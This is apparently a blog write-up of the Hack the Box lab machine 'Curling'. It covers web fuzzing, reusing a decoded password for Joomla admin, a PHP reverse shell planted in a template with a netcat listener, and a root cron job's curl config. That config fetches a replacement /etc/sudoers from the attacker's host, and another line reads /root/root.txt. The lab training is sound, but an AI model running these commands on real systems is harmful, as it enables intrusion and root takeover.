Hack the Box Curling
My write-up on HTB’s retired machine “Curling”.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
Used nmapAutomator to automate the process of recon/enumeration and here’s the summary of the output.
--$/home/arcy24/Documents/tools/new/nmapAutomator/./nmapAutomator.sh 10.129.71.21 All
Running all scans on 10.129.71.21
Host is likely running Linux
---------------------Starting Nmap Quick Scan---------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:41 EST
Nmap scan report for 10.129.71.21
Host is up (0.095s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds
GoBuster results:
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/small.txt ===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://curling.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/27 07:21:51 Starting gobuster
===============================================================
/administrator (Status: 301)
/bin (Status: 301)
/cache (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/libraries (Status: 301)
/modules (Status: 301)
/templates (Status: 301)
/tmp (Status: 301)
===============================================================
2020/12/27 07:22:00 Finished
===============================================================
Enumeration
Web recon on “http://curling.htb”.
To get the name resolution, edit /etc/hosts file and and the IP address of the HTB’s “Curling” machine.
Conducting further enumeration using wfuzz.
Options that I used:
- -c color
- -w path of wordlist
- -z add extensions for php, html, and txt
- — hc 404 and 403 — hide http response codes
└──╼ $sudo wfuzz -c -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html-.txt --hc 404,403 http://curling.htb/FUZZFUZ2Z
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.0.1 - The Web Fuzzer *
********************************************************Target: http://curling.htb/FUZZFUZ2Z
Total requests: 18456===================================================================
ID Response Lines Word Chars Payload
===================================================================000000001: 200 361 L 1051 W 14239 Ch "http://curling.htb/"
000001273: 301 9 L 28 W 318 Ch "administrator"
000002509: 301 9 L 28 W 308 Ch "bin"
000002917: 301 9 L 28 W 310 Ch "cache"
000003909: 301 9 L 28 W 315 Ch "components"
000003986: 200 0 L 0 W 0 Ch "configuration - .php"
000007961: 301 9 L 28 W 311 Ch "images"
000008066: 200 361 L 1051 W 14260 Ch "index - .php"
000008049: 301 9 L 28 W 313 Ch "includes"
000008081: 200 361 L 1051 W 14260 Ch "index.php"
000008941: 301 9 L 28 W 313 Ch "language"
000009013: 301 9 L 28 W 312 Ch "layouts"
000009128: 200 339 L 2968 W 18092 Ch "LICENSE - .txt"
000009101: 301 9 L 28 W 314 Ch "libraries"
000009889: 301 9 L 28 W 310 Ch "media"
000010265: 301 9 L 28 W 312 Ch "modules"
000012009: 301 9 L 28 W 312 Ch "plugins"
000013180: 200 72 L 540 W 4872 Ch "README - .txt"
000014148: 200 1 L 1 W 17 Ch "secret - .txt"
000015977: 301 9 L 28 W 314 Ch "templates"
000016273: 301 9 L 28 W 308 Ch "tmp"
000017460: 200 31 L 90 W 1690 Ch "web.config - .txt"Total time: 0
Processed Requests: 18456
Filtered Requests: 18434
Requests/sec.: 0
Based on the results that we have from wfuzz, here are the list of files and directories that we could continue exploring:
- /administrator
- /templates
- secret.txt
- web.config.txt
Let’s figure out what this encoded text is by using our favorite tool “Cyberchef”
Decoded data is “Curling2018” and it is Base64
Since we do not have any user names to use this password, we could use a tool called cewl to generate possible username from the “Cewl Curling Site”, however, I did notice that the admin (superuser) name might be “Floris”.
Logged in as user “Floris” with the password “Curling2018”
Browsing through the Joomla admin site to see if we can find features that we can get in to the system shell.
Found the templates section;
Modify the templates and use “PentestMonkey’s” php-reverse-shell.php. Script is located in /usr/share/webshells/php/ (Kali or Parrot OS)
I used Beez3 template and decided to create my own php file instead of modifying any of the .php files within the template.
Create New File and save as .php
Modify the reverse-shell.php and change the IP and port (your IP and any port of your choosing) then save the file.
Setup netcat listener on port 4444
Initial Foothold
Launch the reverse-shell.php file via browser. To determine the exact path of the php file, I have to check the default page source file to figure out how to load my reverse.php file.
┌─[✗]─[arcy24@parrot]─[~/Documents/htb/Curling]
└──╼ $sudo rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.28] from (UNKNOWN) [10.129.74.128] 56886
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
02:40:51 up 11:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
$
Upgrade shell
#check python version
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/share/python#upgrade shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@curling:/$
Further enumeration
Browsing through /home/floris and identified folder and files
Access denied on user.txt and /admin-area folder, however we can read the password_backup file
Deciphering the hexdump file is a bit challenging in cli, so I decided to use our favorite tool again “Cyberchef”
Determine the file type of the initial output
Added “Detect File Type” and gave us “Bzip2”
Decompress Bzip2 and gave us Gzip
Added Gunzip and gave us Bzip2
Added Bzip2 Decompress and we got TAR
Added Untar and finally gave us password.txt file (noticed I disabled the “Detect File Type” plugin)
Save password.txt file
Switch to user Floris and was able to login
User flag obtained
Privilege Escalation
Ran linpeas and also used another tool called pspy that can snoop on processes without need for root permissions.
./pspy64s revealed that program curl is executed every minute:
2021/01/02 05:31:01 CMD: UID=0 PID=17026 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2021/01/02 05:31:01 CMD: UID=0 PID=17025 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2021/01/02 05:31:01 CMD: UID=0 PID=17024 | /usr/sbin/CRON -f
2021/01/02 05:31:01 CMD: UID=0 PID=17023 | /usr/sbin/CRON -f
Since this box is titled “Curling” we’ll assume that to obtain priv esc we have to utilize curl. Further researched led me that using option “-K” in curl can load config files. Here’s more syntax and features of curl:
Specify the filename to -K, --config as '-' to make curl read the file from stdin.Note that to be able to specify a URL in the config file, you need to specify it using the --url option, and not by simply writ‐
ing the URL on its own line. So, it could look similar to this:url = "https://curl.haxx.se/docs/"When curl is invoked, it (unless -q, --disable is used) checks for a default config file and uses it if found. The default config
file is checked for in the following places in this order:1) curl tries to find the "home dir": It first checks for the CURL_HOME and then the HOME environment variables. Failing that, it
uses getpwuid() on Unix-like systems (which returns the home dir given the current user in your system). On Windows, it then
checks for the APPDATA variable, or as a last resort the '%USERPROFILE%\Application Data'.2) On windows, if there is no .curlrc file in the home dir, it checks for one in the same dir the curl executable is placed. On
Unix-like systems, it will simply try to load .curlrc from the determined home dir.# --- Example file ---
# this is a comment
url = "example.com"
output = "curlhere.html"
user-agent = "superagent/1.0"# and fetch another URL too
url = "example.com/docs/manpage.html"
-O
referer = "http://nowhereatall.example.com/"
# --- End of example file ---This option can be used multiple times to load multiple config files.
Digging more through curl, we could potentially curl a config file and see if we can escalate user “floris” to gain root. I modified my sudoers file from my box and added floris. We will use this to replace the sudoers file in the “Curling” box.
input and report file has root privelege
More on curling, we could also use the command below to read the root.flag as well leveraging the curl cron job that we saw earlier from pspy.
floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > input
To escalate user ‘floris’, have to run the echo command below and serve the sudoers file that we have modified earlier.
Load up the http server:
Run the echo command to modify the input file in “Curling” downloading our modified sudoers file and also replace the sudoers file in “Curling” host.
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.28/sudoers"\noutput = "/etc/sudoers"' > input
Once executed, you will notice that the input file will be replaced
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.28/sudoers"\noutput = "/etc/sudoers"' > input
floris@curling:~/admin-area$ cat input
url = "http://10.10.14.28/sudoers"
output = "/etc/sudoers"
Queue that sudoers file has been downloaded
Root flag
#sudo su and use same password for Floris
floris@curling:~/admin-area$ sudo su
[sudo] password for floris:root@curling:/home/floris/admin-area# whoami
root
root@curling:/home/floris/admin-area# hostname
curling
root@curling:/home/floris/admin-area# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.74.128 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:80d0 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:80d0 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:80:d0 txqueuelen 1000 (Ethernet)
RX packets 168164 bytes 25628058 (25.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 139095 bytes 54461776 (54.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 51861 bytes 15318270 (15.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 51861 bytes 15318270 (15.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Lessons learned
- Web fuzzing using wfuzz; Different method to obtain web paths, folders, and files.
- Dealing with differnt file compression techniques “Thank you CyberChef”
- Cyberchef — Swiss Army Knife for web app for encryption, encoding, compression and data analysis.
- pspy — tool designed to snoop on processes without need for root permissions